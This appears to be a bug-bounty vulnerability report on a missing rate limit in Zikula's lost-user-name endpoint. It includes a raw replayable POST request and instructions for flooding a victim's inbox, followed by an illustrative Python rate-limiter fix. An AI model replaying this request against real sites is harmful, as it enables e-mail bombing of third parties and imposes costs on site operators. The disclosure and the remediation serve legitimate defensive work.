Insufficient Granularity of Access Control in zikula/core
Sep 18th 2021
Missing rate limit lets an attacker send unlimited e-mail to a victim or to any other address
Proof of Concept
There is no rate limit on the lost-user-name endpoint (/zauth/account/lost-user-name), so an attacker can trigger an unlimited number of e-mails to a victim or to any other e-mail address.
POST /zauth/account/lost-user-name
Host: demo.ziku.la
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 222
Origin: https://demo.ziku.la
Connection: close
Referer: https://demo.ziku.la/zauth/account/lost-user-name
Cookie: _zsid=1kkpnmtra80thcmftq7i4ots3d
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

zikulazauthmodule_account_lostusername%5Bemail%5D=aravindtestx%40gmail.com
Set the email parameter to the victim's address and replay this request as many times as desired; every replay causes another verification e-mail to be delivered to the victim's inbox, with no limit enforced per source IP, per session or per target address.
The attacker can therefore send unlimited e-mail to any address. Many e-mail service providers cap outbound volume (for example 1000 e-mails per month on a given plan) and charge extra once the cap is exceeded, so an attacker can use this endpoint to push the site past its quota and make the operator pay for the overage. The same flaw also lets the site be turned into an e-mail bombing tool against arbitrary third-party addresses.
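The fix the report implies is a rate limit on the endpoint. The following is an added example of such a limit, written for this page and not code from the Zikula project. It models the lost-user-name handler as a plain Python function and applies a sliding-window limiter keyed on both the client IP and the target e-mail address, so that neither a single source nor a distributed flood from many addresses can keep sending to one victim. The limits (5 requests per IP per hour, 3 mails per target address per hour), the `FakeClock` and the sample IPs and addresses are all assumptions chosen for the demonstration.

```python
"""Rate limiting for a 'lost user name' e-mail endpoint.

Added example; not Zikula project code. Limits and inputs are assumed
values chosen to demonstrate the control described in the report.
"""
import time
from collections import defaultdict, deque


class RateLimiter:
    """Sliding-window limiter: at most `limit` events per `window` seconds per key."""

    def __init__(self, limit, window_seconds, clock=time.monotonic):
        self.limit = limit
        self.window = window_seconds
        self.clock = clock
        self._events = defaultdict(deque)  # key -> timestamps of recent events

    def allow(self, key):
        now = self.clock()
        events = self._events[key]
        # Drop timestamps that have aged out of the window.
        while events and now - events[0] >= self.window:
            events.popleft()
        if len(events) >= self.limit:
            return False
        events.append(now)
        return True


class LostUserNameHandler:
    """Stand-in for the POST /zauth/account/lost-user-name handler."""

    def __init__(self, clock=time.monotonic):
        # Assumed limits: a real user rarely needs more than a few attempts per hour.
        self.per_ip = RateLimiter(limit=5, window_seconds=3600, clock=clock)
        self.per_email = RateLimiter(limit=3, window_seconds=3600, clock=clock)
        self.outbox = []  # stands in for the mailer; records addresses mailed

    def handle(self, client_ip, email):
        # Per-IP limit first: it is cheap and stops a single attacker outright.
        if not self.per_ip.allow(client_ip):
            return "rate_limited"
        # Per-target limit: stops a distributed flood aimed at one victim,
        # and is what actually caps the cost/annoyance to the mailbox owner.
        if not self.per_email.allow(email):
            return "rate_limited"
        self.outbox.append(email)
        return "sent"


class FakeClock:
    """Controllable clock so the window can be advanced without sleeping."""

    def __init__(self, start=0.0):
        self.t = start

    def __call__(self):
        return self.t

    def advance(self, seconds):
        self.t += seconds


def simulate_flood(handler, requests):
    """Replay (client_ip, email) pairs; return how many mails were actually sent."""
    sent = 0
    for ip, email in requests:
        if handler.handle(ip, email) == "sent":
            sent += 1
    return sent


if __name__ == "__main__":
    clock = FakeClock()
    h = LostUserNameHandler(clock=clock)
    # Constructed sample: one attacker IP replaying the request 1000 times.
    single = simulate_flood(h, [("203.0.113.7", "victim@example.com")] * 1000)
    # Constructed sample: the same flood spread across 250 source IPs.
    h2 = LostUserNameHandler(clock=FakeClock())
    spread = simulate_flood(
        h2, [(f"198.51.100.{i % 250}", "victim@example.com") for i in range(1000)]
    )
    print(f"single-source flood delivered {single} mails, distributed flood {spread}")
```

Returning a distinct "rate_limited" status (an HTTP 429 in practice) is fine here because the endpoint already reveals nothing about whether the address exists; if it did, the limited path should produce the same response body as the success path so the limiter cannot be turned into an enumeration oracle.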